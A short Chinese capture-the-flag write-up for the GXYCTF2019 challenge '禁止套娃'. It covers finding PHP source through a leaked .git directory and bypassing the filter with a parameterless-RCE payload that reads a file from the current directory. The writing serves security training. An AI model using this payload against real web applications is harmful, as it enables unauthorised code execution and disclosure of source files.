[GXYCTF2019]禁止套娃 1
作者:互联网
1.发现
1.1基本操作无果,使用Git Hack扫描后台得到PHP代码。
2.步骤
2.1进行代码审计,根据代码,绕过限制,写出payload,得到flag。
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
3.借鉴
(36条消息) [GXYCTF2019]禁止套娃(.git泄露,无参RCE)_xlcvv的博客-CSDN博客
4.知识点
.git源码泄露
无参RCE
标签:无参,禁止,套娃,代码,git,RCE,GXYCTF2019 来源: https://www.cnblogs.com/WHOAMI-xiaoyu/p/15488271.html